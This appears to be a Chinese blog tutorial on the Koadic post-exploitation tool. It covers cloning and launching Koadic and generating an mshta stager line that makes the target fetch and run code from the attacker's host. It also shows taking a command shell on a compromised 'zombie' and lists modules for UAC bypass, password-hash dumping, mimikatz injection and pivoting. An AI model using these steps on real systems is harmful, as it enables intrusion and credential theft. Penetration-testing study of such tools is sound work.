前言:

在朋友的博客上看到推荐的一款工具Koadic,我接触了以后发现很不错这款工具的强大之处我觉得就是拿到shell后的各种模块功能,我就自己写出来发给大家看看吧。

首先把项目克隆到本地:

项目地址

https://github.com/zerosum0x0/koadic.git

然后解压,如果你要安装到你指定的目录就先cd到那个目录在下载,我是复制到那了,所以我解压。如下图

运行koadic

cd koadic-master/           //cd到软件目录

sudo ./koadic          //用最高权限运行koadic

打开Koadic,显示需要设置的内容

下图命令如下

  1. (koadic: sta/js/mshta)# info     //

查看需要设置的内容

查看工具使用帮助

  1. (koadic: sta/js/mshta)# help

大佬跳过我的翻译,英语很渣而且是全靠感觉翻译的(很辛苦,靠经验和百度翻译蒙)

(koadic: sta/js/mshta)# help        //帮助的意思

COMMAND     DESCRIPTION    命令    描述
———   ————-
load        reloads all modules  //显示
info        shows the current module options//显示当前模块选项。
use         switch to a different module//切换到不同的模块
set         sets a variable for the current module//为当前模块设置一个变量
jobs        shows info about jobs//显示有关工作的信息
help        displays help info for a command//获取一个cmdshell
cmdshell    command shell to interact with a zombie// 命令 shell 与僵尸交互
kill        shows info about jobs//显示有关工作的信息
listeners   shows info about stagers//显示信息的传输器载荷
exit        exits the program//退出
zombies     lists hooked targets//显示所有僵尸会话
run         runs the current module//运行,和exploit一个样
verbose     exits the program//退出程序

进入主题 ,开始设置。听着是不是热血沸腾要往下看了,哈哈。其实没啥要讲的,你只需要set lhost

这个命令大家应该都懂得,就是设置本地ip。

如下图

注意看,他生成了一个网址,

其实这是一个恶意网址,里面装载了exploit

最后生成的利用命令如下

  1. mshta http://192.168.0.105:9999/S8QoC

利用方法是放到cmd里面执行

如下图

其实你可以看到他弹出了事件查看器我也不知道为什么,不是我点开的啊,

也可能会好奇mshta是什么意思,正解如下

mshta.exe是微软Windows操作系统相关程序,用于执行.HTA文件

我想就是这样利用的吧

那么当目标主机运行这个命令的时候,我们这边就反弹回来了会话 会话ID为0

如下图

如果是用其他复制批量执行了这个命令,会话比较多的话可以执行zombies来查看左右会话,并选择id进行控制

然后如果我这里想获取一个cmdshell的话,方法如下

cmdshell ID

我这里应该是  cmdshell 0

如下图

当然这怎么能算得上好用的后渗透呢,这怎么能满足大家呢

当然了,上面只是普通操作,普通操作,所谓后渗透,在下面,

慢慢看嘛,这个后渗透工具值得上榜的原因我认为有几条

1.环境要求不高

2.操作很简单

3.提供的后渗透模块很实用丰富

后渗透模块我就不一个一个讲了,设置都很简单

我主要给你们说一下名字

 
  1. Hooks a zombie
  2. Elevates integrity (UAC Bypass)
  3. Dumps SAM/SECURITY hive for passwords
  4. Scans local network for open SMB
  5. Pivots to another machine

Stagers(传输器载荷)

Stagers hook target zombies and allow you to use implants.

传输器载荷可以 hook 目标僵尸,进而方便使用植入。

Module Description
stager/js/mshta 可以使用HTML的应用程序在内存中的有效载荷mshta.exe
stager/js/regsvr 可以使用regsvr32.exe COM+脚本内存负载
stager/js/rundll32_js serves payloads in memory using rundll32.exe        可以使用rundll32.exe内存负载
stager/js/disk serves payloads using files on disk    使用磁盘上的文件提供有效载荷

Implants(

Implants start jobs on zombies.

Implants 在僵尸上运行。

Module Description
implant/elevate/bypassuac_eventvwr Uses enigma0x3’s eventvwr.exe exploit to bypass UAC on Windows 7, 8, and 10.使用enigma0x3的eventvwr.exe漏洞绕过UAC的Windows 7, 8,和10。
implant/elevate/bypassuac_sdclt Uses enigma0x3’s sdclt.exe exploit to bypass UAC on Windows 10.使用enigma0x3的sdclt.exe漏洞绕过UAC的Windows 10。
implant/fun/zombie Maxes volume and opens The Cranberries YouTube in a hidden window.长量和隐藏的窗口打开小红莓YouTube。
implant/fun/voice Plays a message over text-to-speech.在文本到语音之间传递信息。
implant/gather/clipboard Retrieves the current content of the user clipboard.检索用户剪贴板的当前内容。
implant/gather/hashdump_sam Retrieves hashed passwords from the SAM hive.从SAM hive检索密码。
implant/gather/hashdump_dc Domain controller hashes from the NTDS.dit file.域控制器hashes从NTDS。说文件。
implant/inject/mimikatz_dynwrapx Injects a reflective-loaded DLL to run powerkatz.dll (using Dynamic Wrapper X).注入一个反射加载的DLL来运行powerkatz。dll(使用动态包装器X)。
implant/inject/mimikatz_dotnet2js Injects a reflective-loaded DLL to run powerkatz.dll (@tirannido DotNetToJS).注入一个反射加载的DLL来运行powerkatz。dll(@tirannido DotNetToJS)。
implant/inject/shellcode_excel Runs arbitrary shellcode payload (if Excel is installed).运行任意的shell代码有效负载(如果已经安装了Excel)。
implant/manage/enable_rdesktop Enables remote desktop on the target.在目标上启用远程桌面。
implant/manage/exec_cmd Run an arbitrary command on the target, and optionally receive the output.在目标上运行任意命令,并可选地接收输出。
implant/pivot/stage_wmi Hook a zombie on another machine using WMI.用WMI把僵尸挂在另一台机器上。
implant/pivot/exec_psexec Run a command on another machine using psexec from sysinternals.使用sysinternals中的psexec在另一台机器上运行一个命令。
implant/scan/tcp Uses HTTP to scan open TCP ports on the target zombie LAN.使用HTTP扫描目标僵尸网络上的TCP端口。
implant/utils/download_file Downloads a file from the target zombie.从目标僵尸下载一个文件
implant/utils/upload_file Uploads a file from the listening server to the target zombies.上传一个从监听服务器到目标僵尸的文件

Disclaimer 声明

代码示例仅供教育参考,因为只有研究攻击者使用的攻击手段,才能建立足够强大的防御体系。 在未经事先许可的情况下使用此代码对目标系统进行操作是非法的,作者对此不负任何责任。

编辑:Pingx

有不好的地方请指出

带你了解后渗透工具Koadic的更多相关文章

  1. 有趣的后渗透工具 Koadic

    koadic是DEFCON黑客大会上分享出来的的一个后渗透工具,虽然和msf有些相似,但是Koadic主要是通过使用Windows ScriptHost(也称为JScript / VBScript)进 ...

  2. 后渗透工具Empire使用教程

    一.前言 Empire是一个PowerShell后期漏洞利用代理工具同时也是一款很强大的后渗透测神器,它建立在密码学.安全通信和灵活的架构之上.Empire实现了无需powershell.exe就可运 ...

  3. 渗透攻防工具篇-后渗透阶段的Meterpreter

    作者:坏蛋链接:https://zhuanlan.zhihu.com/p/23677530来源:知乎著作权归作者所有.商业转载请联系作者获得授权,非商业转载请注明出处. 前言 熟悉Metasploit ...

  4. 后渗透提权辅助工具BeRoot详解

    0x00 工具介绍 前言 BeRoot是一个后期开发工具,用于检查常见的Windows的配置错误,以方便找到提高我们提权的方法.其二进制编译地址为: https://github.com/Alessa ...

  5. iOS macOS的后渗透利用工具:EggShell

    EggShell是一款基于Python编写的iOS和macOS的后渗透利用工具.它有点类似于metasploit,我们可以用它来创建payload建立侦听.此外,在反弹回的session会话也为我们提 ...

  6. Enumy:一款功能强大的Linux后渗透提权枚举工具

    Enumy是一款功能强大的Linux后渗透提权枚举工具,该工具是一个速度非常快的可移植可执行文件,广大研究人员可以在针对Linux设备的渗透测试以及CTF的后渗透阶段利用该工具实现权限提升,而Enum ...

  7. Metasploit简单使用——后渗透阶段

    在上文中我们复现了永恒之蓝漏洞,这里我们学习一下利用msf简单的后渗透阶段的知识/ 一.meterperter常用命令 sysinfo #查看目标主机系统信息 run scraper #查看目标主机详 ...

  8. Metasploit Framework(8)后渗透测试(一)

    文章的格式也许不是很好看,也没有什么合理的顺序 完全是想到什么写一些什么,但各个方面都涵盖到了 能耐下心看的朋友欢迎一起学习,大牛和杠精们请绕道 使用场景: Kali机器IP:192.168.163. ...

  9. 攻击者利用的Windows命令、横向渗透工具分析结果列表

    横向渗透工具分析结果列表 https://jpcertcc.github.io/ToolAnalysisResultSheet/ 攻击者利用的Windows命令 https://blogs.jpcer ...

随机推荐

  1. java redis 实现用户签到功能(很普通简单的签到功能)

    业务需求是用户每天只能签到一次,而且签到后用户增加积分,所以把用户每次签到时放到redis 缓存里面,然后每天凌晨时再清除缓存,大概简单思想是这样的 直接看代码吧如下 @Transactional @ ...

  2. HeroM2连击技能设置和DB完整数据

    连击技能设置: M2\选项\功能设置\技能魔法\通用技能\连击技能 魔法DB: 81;倚天辟地;0;55;5;10;10;5;6;6;99;15;5;15;10;15;15;60;; 300;万剑归宗 ...

  3. 【STM32H7教程】第58章 STM32H7的硬件JPEG应用之图片解码显示

    完整教程下载地址:http://www.armbbs.cn/forum.php?mod=viewthread&tid=86980 第58章       STM32H7的硬件JPEG应用之图片解 ...

  4. JavaSE复习~方法基础

    方法的概念 方法:就是讲一个功能抽取出来,把代码单独定义在其中,形成一个单独的功能 我们需要这个功能的时候,就可以去调用,实现了代码的复用性,也解决了代码冗余的问题 方法的定义 定义的一般格式:jav ...

  5. vue 事件总线(bus)

    1.全局引入bus Vue.prototype.$bus = new.Vue() 2.组件间传值使用(在发送事件时接收组件会实时接收到, 可以用做兄弟组件间相互传值, 但页面跳转组件间有问题 通过$e ...

  6. Spring Boot 2.x 入门前的准备-IntelliJ IDEA 开发工具的安装与使用

    常用的用于开发 spring boot 项目的开发工具有 eclipse 和 IntelliJ IDEA 两种,最近有声音提出 visual code 也开始流行开发 java,而且确实如此, vs ...

  7. python的matplotlib的热门可视化动图

    1.图 2.代码 import pandas as pd import matplotlib as mpl import matplotlib.pyplot as plt import matplot ...

  8. 使用命令将单个java文件打包为jar

    思路:先将java文件编译为class文件,然后再打包为jar 参考博文:https://www.cnblogs.com/sxdcgaq8080/p/8126770.html http://www.m ...

  9. mcast_get_if函数

    #include <errno.h> int sockfd_to_family(int); int mcast_get_if(int sockfd) { switch (sockfd_to ...

  10. 最全BT磁力搜索引擎,国外最受欢迎的BT-磁力网站(整理分享,每日不断更新...)

    最全BT磁力搜索引擎索引(整理分享,每日更新) 1.海盗湾 The Pirate Bay 2.磁力天堂(BT磁力搜索下载-磁力天堂) www.btaa.xyz  (资源多,下载速度可以,建议用手机访问 ...